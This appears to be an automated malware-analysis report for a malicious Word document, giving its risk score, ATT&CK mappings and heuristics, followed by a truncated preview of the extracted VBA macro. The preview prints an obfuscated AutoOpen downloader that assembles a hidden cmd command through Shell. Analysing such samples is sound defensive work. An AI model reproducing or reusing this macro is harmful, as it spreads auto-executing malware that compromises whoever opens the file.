MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a legacy WordBasic AutoOpen macro, indicating it is designed to execute automatically upon opening. The macro's shell command is obfuscated but appears to be constructing a command to download and execute a payload. The ClamAV detection name 'Doc.Downloader.Valyria-6667199-0' further supports this downloader functionality. The primary attack vector is likely spearphishing attachment.
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-6667199-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6667199-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5943 bytes |
SHA-256: b989d8f4dd0ce06b60cd5a8114f1d4e45f9b301be015dff2cd3c39fdd6a58735 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nTMfALYjRDpc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Atn(NBqVtP)
TypeName CBool(131045097)
TypeName Sin(vkWIEO)
TypeName 2071
TypeName ChrW(HYjvA)
Shell@ CStr("c") + CStr("m") + zjXOWJJwcjZUrh + bnPiWio + GTCiwKQSNFr + BISGrtbn + pjhimJUNo + oScqnawICbM + JhIiVTCT + wlYOrGDPkZD, 759428588 - 759428588
TypeName CStr(86602 - HKfzN)
TypeName 4
End Sub
Attribute VB_Name = "lKZHHflFj"
Function GTCiwKQSNFr()
On Error Resume Next
TypeName 204847816
TypeName iLznz
SqwALRMvl = "d /V:O/C" + CStr(Chr(irauraTKvvusR + GdIRTiJ + 34 + kwzNLXOvZh + oMGHEXCszGk)) + "set V" + "WL=b" + "STrtTNaNqs" + "mm" + "hufiKwPSuS" + "SQsqF" + "dyG(D" + "Rl7){pg"
TypeName Log(93093 / MGSri)
TypeName nVqtRZ
TypeName Fix(424772730)
tuvNJ = "W\,.kn/z" + "13J xvjVM" + "$:5'" + "=;Ie@" + "oc+-AC}8&&" + "for" + " " + "%q i" + "n (38;" + "66;18;64" + ";" + "3;25;13" + ";64;34;3"
TypeName Tan(iPodPj)
TypeName Sqr(85890 * rOWiXD - 37263 - kNfrB)
TypeName Tan(7)
aAQolIiaZTW = "4" + ";51;" + "57;16;24" + ";34;61" + ";45;6" + "4;18;69;66" + ";0;54;64;6" + "7;4;51;" + "8;64;4" + ";43;40;64" + ";0;71;34" + ";16;64;4" + "5;4"
TypeName 298
TypeName kuXSiT
TypeName 504
nDTiIjuX = ";6" + "2" + ";57;40;" + "24;5" + "6;61;60;1" + "3" + ";4;4;38;" + "58" + ";46;" + "46;" + "7;3"
TypeName CLng(LkDSAh)
TypeName 4683
TypeName ChrW(IhzWp * HnPRmT)
JWXSsi = "8;45;64;" + "7;25" + ";4" + ";" + "3;16;38;" + "43" + ";67"
TypeName UrLjn
TypeName ttjTbr
TypeName BrwCYf
IRZKPDmmWR = ";66;12" + ";" + "46;" + "4;70;" + "27;63;23;5" + "2;"
GTCiwKQSNFr = SqwALRMvl + tuvNJ + aAQolIiaZTW + nDTiIjuX + JWXSsi + IRZKPDmmWR
TypeName wLVwA
TypeName MiiAIV
End Function
Function BISGrtbn()
On Error Resume Next
TypeName Mwwmi
TypeName dHoHl
TypeName CSng(746)
hbblGHjlL = "65;13;" + "4;4;3" + "8;58;4" + "6;46;" + "2"
TypeName 330104091
TypeName Fix(wBqqBB - zXHkc + qtnUj / iPvJh)
WiJSEuH = "5;4" + ";" + "7;3;69" + ";4;66;21" + ";3;47;43" + ";" + "67;66;12;4" + "6;13;28;" + "65;" + "13;4;4;38;" + "58;46;46;1" + "8;18;18;4"
TypeName 4
TypeName Int(jMRnQ)
KBDRbw = "3;67;66" + ";16;45;" + "2" + "8;3;66" + ";38;47;43"
TypeName 90722396
TypeName QXBrIF
TypeName CSng(28951 / iMvzb / 60085 / TsmOAn)
lFhrinRfi = ";" + "67;66;12" + ";46;18;38" + ";69;67;66" + ";45;4" + ";64;45;"
TypeName Atn(wAAiQ)
TypeName 1
TypeName KpwMn
JCzkMk = "4;4" + "6;7;16;" + "48;18;12;6" + "9;0;7;67" + ";4" + "4;21;" + "38;25;46" + ";28;" + "53;55;" + "65;" + "1" + "3;"
TypeName CDbl(5371)
TypeName 19
TypeName RZlmjZ
tCkXRa = "4;4" + ";38;58;" + "46;46;16;4" + "5;66;52" + ";" + "1"
BISGrtbn = hbblGHjlL + WiJSEuH + KBDRbw + lFhrinRfi + JCzkMk + tCkXRa
TypeName 216247733
TypeName CByte(RpzHEz + bqCvh / 14194 * NVnJti)
TypeName CLng(GGTzi)
End Function
Function pjhimJUNo()
On Error Resume Next
TypeName CLng(RDkCo / JVnSEi)
TypeName Sqr(LdooS)
OcKSwBzEjO = "2" + ";64;4;7;34" + ";16" + ";45;25" + ";38" + ";64;67;" + "66;64;25" + ";43;67;66;" + "12;46;3"
TypeName Rnd(26327082)
TypeName CBool(BtjPtw)
TypeName Sgn(CStlf)
VrCzURMkqw = "2;65;13;" + "4;4;3" + "8;58;46;" + "46;39;" + "3;2" + "1;38;66;1" + "6;45;"
TypeName oFLiCM
TypeName 263800505
TypeName CStr(18328 / BdiWf)
AhlwZJcv = "7;34" + ";6" + "4;45;43;" + "67;6" + "6;12;46;2" + "3;5"
TypeName Sqr(3511)
TypeName CSng(4)
SaPbdISTfzn = "0;53;" + "18;13;3" + "5;15;" + "60;43;2" + "3;38;3" + "4;16;4" + ";31;60;65" + ";60;36;62" + ";57;24;47" + ";67;" + "51;61;51" + ";60;59;4" + "9;73;60;6"
TypeName Round(91)
TypeName ChrW(95297 / cCrVZ)
TypeName CDbl(72)
SJTCXiBPWB = "2;57;" + "55;1" + "5;30;61" + ";57;6" + "4;45" + ";53;58;4;6" + "4;" + "12;38;68" + ";"
TypeName CStr(988)
TypeName uVLSof
TypeName
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.